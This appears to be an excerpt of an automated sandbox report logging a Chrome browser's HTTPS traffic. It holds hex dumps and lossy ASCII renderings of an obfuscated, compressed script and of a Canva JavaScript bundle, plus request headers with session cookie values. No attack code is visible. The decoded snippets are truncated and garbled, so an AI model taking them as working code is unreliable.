                                                                                                                                                                                                                                                                    Data Ascii: rJNgosybghyUrvtupqgbyuarnQqbj?oqeabbbfa2poc,z1,10bt1
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: c4 a9 6e 79 c4 8b c4 96 c5 ae 46 67 65 c4 b1 74 c5 ab c5 8f c4 ac c5 aa 63 6b 3f 64 68 72 65 6c 3f 74 c4 8c 42 6a 61 43 c5 8f c5 8b 65 c5 83 41 6e c5 80 c5 b9 c6 92 67 c6 97 c5 af c5 af c5 8a 72 42 73 3f 66 c4 8c c6 a2 c5 ae c5 b0 c6 a6 c6 a8 c6 a0 c6 94 c6 96 c6 98 c6 8e c5 83 c4 89 66 70 c6 82 63 c5 ae c4 96 65 68 c4 94 76 c5 80 c6 a9 c5 8b 72 70 75 46 6c c4 94 75 72 66 76 c5 b9 41 c5 af 76 73 76 70 c5 9d 76 c4 9f 3f 43 c6 8e 7a c7 8e c7 8d c4 9f c5 b9 53 c6 bf c5 a9 c7 97 61 3f c6 9c c5 97 74 c5 9d c5 90 c5 b2 71 71 52 c4 b7 c4 a2 c7 8e c4 8d 61 c6 8e c5 b2 67 67 c4 81 75 c7 af c4 a1 c5 aa c4 a6 c7 b8 c7 86 c7 bb c4 94 3f 65 72 7a 62 c4 b7 c8 81 67 59 c7 b2 c4 a1 c7 b5 c7 98 c4 a6 c5 97 c4 91 c5 86 72 c8 91 72 5a c8 85 c5 90 c6 90 c4 ad c5 9d 73 c5 90
                                                                                                                                                                                                                                                                    Data Ascii: nyFgetck?dhrel?tBjaCeAngrBs?ffpcehvrpuFlurfvAvsvpv?CzSa?tqqRaggu?erzbgYrrZs
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 98 d3 99 d3 9b d2 8b c5 b9 cf 81 c6 a9 c6 b9 76 c6 bb 5f 73 c7 a5 c6 b8 c6 ba 67 d3 a7 c7 a2 c6 a9 d1 9e d1 98 d1 a1 d1 9d c4 8b d3 b1 7a 5f ca 84 52 5f c5 a5 c4 aa d1 8d c4 96 d1 9d cc 81 c4 94 d1 a1 66 d1 a4 c4 8e 6a c7 92 67 d1 a3 c4 a5 c7 b5 c6 bf 6a c4 b3 cc 8e c4 a8 c9 b6 c4 86 3f 50 c8 ba ce ab cb 89 ca 9c c9 b1 d1 bf c9 80 c5 80 c4 8b c7 98 51 c8 b4 78 d4 9f c4 82 cd b2 c7 99 d2 95 c4 81 6c 21 c4 80 71 c6 92 c4 96 c6 97 c4 b6 d4 a7 21 43 ca 97 66 d1 a1 c7 90 46 d3 a4 c6 bb 3f 57 d1 a3 c4 8a cd a8 ca 99 cc 8e c4 8d d1 8e d1 89 c6 81 ca ab c9 80 66 4e c7 b7 c6 82 c9 bf c4 af c5 9d c6 81 76 d5 8b cd 8f cb 9d 6b 47 cc b0 75 d4 b2 c4 b1 d1 ba c4 97 d5 95 c8 89 cd 8c d5 95 cc b2 c6 9a c4 b0 61 ca 99 c5 aa c4 a1 c5 b6 c6 8e cd 95 c4 89 c8 95 c5 b9 c5 80
                                                                                                                                                                                                                                                                    Data Ascii: v_sgz_R_fjgj?PQxl!q!CfF?WfNvkGua
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: d3 8d 21 d5 bf d3 aa 72 c4 a1 d4 94 ce aa cb 97 28 32 cf 95 2c df b8 36 29 2e c6 a0 d2 80 d1 8a 28 22 cf a2 79 22 29 3b c7 92 28 74 de 93 de 95 d7 84 3d 74 df be c4 8c 52 d1 8a c4 a1 c8 af 28 6e 2b 22 cf b1 cb b1 c9 bb cf b5 c8 a1 cf b8 65 cf ba 61 c8 9d e0 a0 86 3b 66 26 26 28 61 dd 86 e0 a0 8f e0 a0 91 c6 a1 d0 b4 cd a7 c6 8e 28 66 5b 65 e0 a0 99 5f 49 52 41 51 42 45 5f 22 2b 6e 5d 29 dd 9c 2e de 9f e0 a0 90 c6 a0 43 e0 a0 b0 cd 9b 65 e0 a0 b3 e0 a0 b5 e0 a0 b7 45 e0 a0 ba 51 52 e0 a1 91 e0 a0 be e0 a1 80 e0 a1 82 29 29 7d 7d c7 95 67 c7 86 de 92 7b 7d d8 bf ca 9f de 8b c9 ab e0 a0 aa e0 a1 9a e0 a1 9d e0 a1 9f 72 de 93 e0 a1 a3 c8 97 d2 ae e0 a1 a6 7b d0 b6 72 7d e0 a1 9a df a7 3f d4 97 6f 48 45 59 d7 b5 c9 84 d7 bf d7 9a 6c c4 8c d7 84 cc 94 dd bd cd
                                                                                                                                                                                                                                                                    Data Ascii: !r(2,6).("y");(t=tR(n+"ea;f&&(a(f[e_IRAQBE_"+n]).CeEQR))}}g{}r{r}?oHEYl
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: a4 a0 c5 af c7 b5 2e 4d 76 e0 aa 9e 71 e0 aa 9e 5f 55 e0 a8 b7 e0 aa a4 37 cf 89 6b 39 30 e0 aa b1 51 46 5f 31 e0 aa 83 e0 a9 90 ca 99 c4 9a cb 97 d2 9e 5b 71 cb 95 e0 a9 91 e0 a5 81 cf a9 c5 98 de 98 c4 8b d4 8a 65 cb 80 c9 81 22 c5 a3 e0 a8 b8 c5 af cd a6 e0 a7 9b e0 aa bd d1 80 c7 8d c8 bb c4 8b ce a1 e0 a2 b5 e0 a9 9b 6c e0 aa ac e0 a9 81 c4 84 e0 aa ac 5f e0 a9 ab 5f c5 ae e0 a8 b6 e0 a9 a9 c4 ac e0 aa ac e0 a8 b7 7a c9 bc e0 aa ad c7 92 e0 a4 b8 e0 aa bc e0 aa 9b 71 e0 ab 9c c4 a5 32 e0 aa bc e0 aa 84 c5 ac cd 84 e0 a8 b7 d5 8b c5 ae 61 5f d4 83 c9 84 e0 aa 83 cb b6 d4 bf d1 ae ca 9c d0 b0 e0 a2 b1 e0 a9 b0 ca 9c 5f cc 9c c9 b1 e0 a8 b7 43 c8 b7 cc 9c 70 c5 98 d4 8a e0 aa 83 e0 ac 8f c9 a1 c7 94 e0 ac 93 e0 a7 b5 df 82 e0 ac 90 e0 ac 98 e0 ab 84 d1
                                                                                                                                                                                                                                                                    Data Ascii: .Mvq_U7k90QF_1[qe"l__zq2a__Cp
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 2c 6a 2c 48 2c 44 2c 54 2c 45 2c 4f 2c 46 2c 49 2c 4e 2c 7a 2c 50 2c 5a 2c 4d 2c 55 2c 4a 2c 56 2c 42 2c 4c 2c 51 2c 57 2c 59 3d 69 28 30 29 2c 58 3d 69 28 31 29 2c 4b 3d 69 28 32 29 2c 24 3d 69 28 33 29 2c 6e 6e 3d 69 28 34 29 2c 74 6e 3d 5b 59 2c 58 2c 22 38 22 2c 22 34 36 22 5d 2c 72 6e 3d 74 6e 2e 63 6f 6e 63 61 74 28 5b 4b 2c 24 2c 6e 6e 2c 22 33 32 22 2c 22 31 33 22 2c 22 31 30 22 5d 29 2c 65 6e 3d 69 28 35 29 2c 6f 6e 3d 69 28 36 29 2c 75 6e 3d 69 28 37 29 2c 63 6e 3d 69 28 38 29 2c 61 6e 3d 69 28 39 29 2c 66 6e 3d 69 28 31 30 29 2c 73 6e 3d 69 28 31 31 29 2c 6c 6e 3d 69 28 31 32 29 2c 68 6e 3d 69 28 31 33 29 2c 76 6e 3d 69 28 31 34 29 2c 70 6e 3d 69 28 31 35 29 2c 67 6e 3d 69 28 31 36 29 2c 64 6e 3d 69 28 31 37 29 2c 79 6e 3d 69 28 31 38 29 2c 6d
                                                                                                                                                                                                                                                                    Data Ascii: ,j,H,D,T,E,O,F,I,N,z,P,Z,M,U,J,V,B,L,Q,W,Y=i(0),X=i(1),K=i(2),$=i(3),nn=i(4),tn=[Y,X,"8","46"],rn=tn.concat([K,$,nn,"32","13","10"]),en=i(5),on=i(6),un=i(7),cn=i(8),an=i(9),fn=i(10),sn=i(11),ln=i(12),hn=i(13),vn=i(14),pn=i(15),gn=i(16),dn=i(17),yn=i(18),m
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 63 72 65 65 6e 7d 2c 61 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 6c 6f 63 61 74 69 6f 6e 7d 2c 66 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 63 74 28 6e 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 7d 2c 73 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 63 74 28 6e 29 2e 62 6f 64 79 7d 2c 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 6e 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 74 2c 72 29 7d 2c 68 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 69 66 28 6e 2e 67 65 74 41 74 74 72 69 62 75 74 65 29 72 65 74 75 72 6e 20 6e 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 7d 2c 76 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 6e 26 26 6e 2e 61 70 70 65 6e
                                                                                                                                                                                                                                                                    Data Ascii: creen},at=function(n){return n.location},ft=function(n){return ct(n).documentElement},st=function(n){return ct(n).body},lt=function(n,t,r){return n.setAttribute(t,r)},ht=function(n,t){if(n.getAttribute)return n.getAttribute(t)},vt=function(n,t){n&&n.appen
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 52 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 22 76 61 6c 75 65 73 22 69 6e 20 49 6e 29 72 65 74 75 72 6e 20 49 6e 2e 76 61 6c 75 65 73 28 6e 29 3b 76 61 72 20 74 2c 72 3d 5b 5d 3b 66 6f 72 28 74 20 69 6e 20 6e 29 4b 6e 28 6e 2c 74 29 26 26 72 2e 70 75 73 68 28 6e 5b 74 5d 29 3b 72 65 74 75 72 6e 20 72 7d 2c 6a 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 22 6b 65 79 73 22 69 6e 20 49 6e 29 72 65 74 75 72 6e 20 49 6e 2e 6b 65 79 73 28 6e 29 3b 76 61 72 20 74 2c 72 3d 5b 5d 3b 66 6f 72 28 74 20 69 6e 20 6e 29 4b 6e 28 6e 2c 74 29 26 26 72 2e 70 75 73 68 28 74 29 3b 72 65 74 75 72 6e 20 72 7d 2c 48 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 66 6f 72 28 76 61 72 20 65 3d 72 2c 6f 3d 30 2c 75 3d 30 2c 63 3d 6e 3b 75 3c 63 2e 6c 65 6e
                                                                                                                                                                                                                                                                    Data Ascii: Rt=function(n){if("values"in In)return In.values(n);var t,r=[];for(t in n)Kn(n,t)&&r.push(n[t]);return r},jt=function(n){if("keys"in In)return In.keys(n);var t,r=[];for(t in n)Kn(n,t)&&r.push(t);return r},Ht=function(n,t,r){for(var e=r,o=0,u=0,c=n;u<c.len


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    54192.168.2.1249777104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:39 UTC787OUTGET /web/fbc5f28f9cb20366.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:40 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 24352
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59510ebac36a5e-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49980
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "b6bd953d37aa2ec727eac3cfe20081de"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:26 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:25 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: 8LoqSemw8LUv3qkfDDvFyJX4ZEHIw4ebnmhjQQdpoaLMYZsanUH6S/dyhBehxfxvOLNT3jcjXDc=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8HQ6YNF45RPW7S
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: V5Ayj17F_0C_t9cTRFJhjk3KeEsidnj0
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 6a 34 63 70 36 6f 78 52 34 67 78 25 32 46 63 49 36 53 36 71 57 44 41 66 39 36 57 65 61 51 73 6d 33 33 55 42 46 52 39 6a 4e 6a 37 34 57 44 50 25 32 46 25 32 42 70 42 38 57 72 52 72 30 56 66 33 4f 59 7a 38 25 32 46 4b 79 71 66 49 76 48 71 42 64 72 6d 74 6e 41 70 25 32 46 42 74 69 66 43 30 46 4e 41 37 65 66 33 61 32 33 55 71 75 7a 53 30 62 72 77 75 6f 39 65 36 77 6a 56 33 4e 25 32 46 6e 53 4e 59 4f 7a 71 6a 55 78 52 65 46 33 6f 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j4cp6oxR4gx%2FcI6S6qWDAf96WeaQsm33UBFR9jNj74WDP%2F%2BpB8WrRr0Vf3OYz8%2FKyqfIvHqBdrmtnAp%2FBtifC0FNA7ef3a23UquzS0brwuo9e6wjV3N%2FnSNYOzqjUxReF3o%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1192INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 36 33 30 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 37 39 31 39 34 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 34 35
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[9630],{/***/ 79194:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 6f 6c 76 65 2c 70 3d 28 29 3d 3e 7b 6e 28 61 2e 61 70 70 6c 79 28 74 68 69 73 2c 6c 29 29 3b 67 3d 76 6f 69 64 20 30 7d 3b 65 26 26 6b 3f 70 28 29 3a 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 66 29 2c 66 3d 73 65 74 54 69 6d 65 6f 75 74 28 70 2c 64 29 29 3b 65 26 26 28 6b 3d 21 31 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 68 29 2c 68 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 6b 3d 21 30 2c 64 29 29 3b 72 65 74 75 72 6e 20 6d 7d 7d 3b 0a 74 71 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 3b 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 64 6f 77 6e 22 2c 62 3d 3e 7b 22 54 61 62 22 3d 3d 3d 62 2e 6b 65 79 26 26 5f 5f 63 2e 75 69 2e 7a 7a 28 22 6b 65 79 62 6f 61 72 64 22 29 7d 2c 21 30 29 3b 61
                                                                                                                                                                                                                                                                    Data Ascii: olve,p=()=>{n(a.apply(this,l));g=void 0};e&&k?p():(clearTimeout(f),f=setTimeout(p,d));e&&(k=!1,clearTimeout(h),h=setTimeout(()=>k=!0,d));return m}};tqa=function(){var a=document;a.addEventListener("keydown",b=>{"Tab"===b.key&&__c.ui.zz("keyboard")},!0);a
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 74 2c 66 75 3a 62 2e 78 2c 24 78 3a 62 2e 79 2c 61 6c 74 4b 65 79 3a 61 2e 41 53 2e 61 6c 74 4b 65 79 2c 63 74 72 6c 4b 65 79 3a 61 2e 41 53 2e 63 74 72 6c 4b 65 79 2c 6d 65 74 61 4b 65 79 3a 61 2e 41 53 2e 6d 65 74 61 4b 65 79 2c 73 68 69 66 74 4b 65 79 3a 61 2e 41 53 2e 73 68 69 66 74 4b 65 79 2c 70 6f 69 6e 74 65 72 54 79 70 65 3a 61 2e 70 6f 69 6e 74 65 72 54 79 70 65 7d 7d 3b 0a 76 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 63 6f 6e 73 74 20 63 3d 62 2e 6d 65 64 69 75 6d 7c 7c 62 2e 73 6d 61 6c 6c 7c 7c 62 2e 6f 6a 7c 7c 62 2e 75 70 3b 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 20 22 74 69 6e 79 22 3a 72 65 74 75 72 6e 5b 62 2e 75 70 7c 7c 63 2c 22 52 33 42 55 70 77 20 64 6b 57 79 70 77 22 5d 3b 63 61 73 65 20 22 73 6d 61 6c 6c 22 3a 72 65 74
                                                                                                                                                                                                                                                                    Data Ascii: t,fu:b.x,$x:b.y,altKey:a.AS.altKey,ctrlKey:a.AS.ctrlKey,metaKey:a.AS.metaKey,shiftKey:a.AS.shiftKey,pointerType:a.pointerType}};vqa=function(a,b){const c=b.medium||b.small||b.oj||b.up;switch(a){case "tiny":return[b.up||c,"R3BUpw dkWypw"];case "small":ret
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 6e 22 45 78 74 72 61 53 6d 61 6c 6c 22 3b 63 61 73 65 20 22 78 78 73 6d 61 6c 6c 22 3a 72 65 74 75 72 6e 22 45 78 74 72 61 45 78 74 72 61 53 6d 61 6c 6c 22 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 5f 5f 63 2e 42 28 61 29 3b 7d 7d 3b 78 71 61 3d 66 75 6e 63 74 69 6f 6e 28 7b 76 61 72 69 61 6e 74 3a 61 2c 73 69 7a 65 3a 62 7d 29 7b 61 3a 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 20 22 72 65 67 75 6c 61 72 22 3a 61 3d 22 22 3b 62 72 65 61 6b 20 61 3b 63 61 73 65 20 22 74 69 74 6c 65 22 3a 61 3d 22 54 69 74 6c 65 22 3b 62 72 65 61 6b 20 61 3b 63 61 73 65 20 22 62 6f 6c 64 22 3a 61 3d 22 42 6f 6c 64 22 3b 62 72 65 61 6b 20 61 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 5f 5f 63 2e 42 28 61 29 3b 7d 72 65 74 75 72 6e 20 43 69 5b 60
                                                                                                                                                                                                                                                                    Data Ascii: n"ExtraSmall";case "xxsmall":return"ExtraExtraSmall";default:throw new __c.B(a);}};xqa=function({variant:a,size:b}){a:switch(a){case "regular":a="";break a;case "title":a="Title";break a;case "bold":a="Bold";break a;default:throw new __c.B(a);}return Ci[`
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 70 22 2c 74 68 69 73 2e 6f 6e 4d 6f 75 73 65 55 70 2c 7b 63 61 70 74 75 72 65 3a 21 30 7d 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 2c 63 2c 64 29 7b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 3d 61 3b 74 68 69 73 2e 6f 6e 50 6f 69 6e 74 65 72 44 6f 77 6e 3d 62 3b 74 68 69 73 2e 6f 6e 50 6f 69 6e 74 65 72 4d 6f 76 65 3d 63 3b 74 68 69 73 2e 6f 6e 50 6f 69 6e 74 65 72 55 70 3d 64 3b 74 68 69 73 2e 74 79 70 65 3d 22 6d 6f 75 73 65 22 3b 74 68 69 73 2e 6f 6e 4d 6f 75 73 65 44 6f 77 6e 3d 65 3d 3e 7b 63 6f 6e 73 74 20 66 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 6d 6f 76 65 22 2c 74 68 69 73 2e 6f 6e 4d 6f 75 73 65 4d 6f 76 65 2c 7b 63 61 70
                                                                                                                                                                                                                                                                    Data Ascii: p",this.onMouseUp,{capture:!0})}constructor(a,b,c,d){this.element=a;this.onPointerDown=b;this.onPointerMove=c;this.onPointerUp=d;this.type="mouse";this.onMouseDown=e=>{const f=this.element.ownerDocument;f.addEventListener("mousemove",this.onMouseMove,{cap
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 29 7d 67 57 28 61 29 7b 66 6f 72 28 63 6f 6e 73 74 20 62 20 6f 66 20 61 2e 63 68 61 6e 67 65 64 54 6f 75 63 68 65 73 29 69 66 28 62 2e 69 64 65 6e 74 69 66 69 65 72 3d 3d 3d 74 68 69 73 2e 69 64 65 6e 74 69 66 69 65 72 29 72 65 74 75 72 6e 20 62 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 74 68 69 73 2e 69 64 65 6e 74 69 66 69 65 72 3d 61 3b 74 68 69 73 2e 74 61 72 67 65 74 3d 62 3b 74 68 69 73 2e 6f 6e 50 6f 69 6e 74 65 72 4d 6f 76 65 3d 63 3b 74 68 69 73 2e 6f 6e 50 6f 69 6e 74 65 72 55 70 3d 64 3b 74 68 69 73 2e 6f 6e 50 6f 69 6e 74 65 72 43 61 6e 63 65 6c 3d 0a 65 3b 74 68 69 73 2e 6f 6e 54 6f 75 63 68 4d 6f 76 65 3d 66 3d 3e 7b 63 6f 6e 73 74 20 67 3d 74 68 69 73 2e 67 57 28 66 29 3b 69 66 28 67 29 74 68 69 73 2e 6f 6e 50
                                                                                                                                                                                                                                                                    Data Ascii: )}gW(a){for(const b of a.changedTouches)if(b.identifier===this.identifier)return b}constructor(a,b,c,d,e){this.identifier=a;this.target=b;this.onPointerMove=c;this.onPointerUp=d;this.onPointerCancel=e;this.onTouchMove=f=>{const g=this.gW(f);if(g)this.onP
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 66 28 74 68 69 73 2e 42 35 29 7b 76 61 72 20 7b 24 61 61 3a 62 3d 77 69 6e 64 6f 77 2e 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 7d 3d 74 68 69 73 3b 62 28 74 68 69 73 2e 42 35 29 7d 74 68 69 73 2e 42 35 3d 30 3b 69 66 28 74 68 69 73 2e 68 63 61 2e 73 69 7a 65 29 7b 62 3d 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 68 63 61 2c 63 3d 3e 74 68 69 73 2e 59 74 2e 67 65 74 28 63 29 29 2e 66 69 6c 74 65 72 28 5f 5f 63 2e 65 62 29 3b 74 68 69 73 2e 68 63 61 2e 63 6c 65 61 72 28 29 3b 66 6f 72 28 63 6f 6e 73 74 20 63 20 6f 66 20 74 68 69 73 2e 72 71 29 6e 75 6c 6c 3d 3d 3d 28 61 3d 63 2e 6f 6e 50 6f 69 6e 74 65 72 4d 6f 76 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 63 61 6c 6c 28 63 2c 62 2c 74 68 69 73 2e 59 74
                                                                                                                                                                                                                                                                    Data Ascii: f(this.B5){var {$aa:b=window.cancelAnimationFrame}=this;b(this.B5)}this.B5=0;if(this.hca.size){b=Array.from(this.hca,c=>this.Yt.get(c)).filter(__c.eb);this.hca.clear();for(const c of this.rq)null===(a=c.onPointerMove)||void 0===a?void 0:a.call(c,b,this.Yt
                                                                                                                                                                                                                                                                    2024-11-20 15:01:40 UTC1369INData Raw: 61 3d 7b 62 61 73 65 55 6e 69 74 3a 22 38 70 78 22 2c 63 6f 6c 6f 72 54 79 70 6f 67 72 61 70 68 79 43 72 69 74 69 63 61 6c 3a 22 76 61 72 28 2d 2d 62 6b 34 31 5a 77 29 22 2c 63 6f 6c 6f 72 54 79 70 6f 67 72 61 70 68 79 50 6f 73 69 74 69 76 65 3a 22 76 61 72 28 2d 2d 50 36 39 71 52 51 29 22 2c 63 6f 6c 6f 72 54 79 70 6f 67 72 61 70 68 79 50 72 69 6d 61 72 79 3a 22 76 61 72 28 2d 2d 56 4e 58 70 53 77 29 22 2c 63 6f 6c 6f 72 54 79 70 6f 67 72 61 70 68 79 53 65 63 6f 6e 64 61 72 79 3a 22 76 61 72 28 2d 2d 35 46 38 4d 46 77 29 22 2c 63 6f 6c 6f 72 54 79 70 6f 67 72 61 70 68 79 54 65 72 74 69 61 72 79 3a 22 76 61 72 28 2d 2d 4a 45 41 71 50 77 29 22 2c 74 69 6e 79 4d 75 6c 74 69 70 6c 69 65 72 3a 22 31 2e 35 22 2c 73 6d 61 6c 6c 4d 75 6c 74 69 70 6c 69 65 72 3a
                                                                                                                                                                                                                                                                    Data Ascii: a={baseUnit:"8px",colorTypographyCritical:"var(--bk41Zw)",colorTypographyPositive:"var(--P69qRQ)",colorTypographyPrimary:"var(--VNXpSw)",colorTypographySecondary:"var(--5F8MFw)",colorTypographyTertiary:"var(--JEAqPw)",tinyMultiplier:"1.5",smallMultiplier:
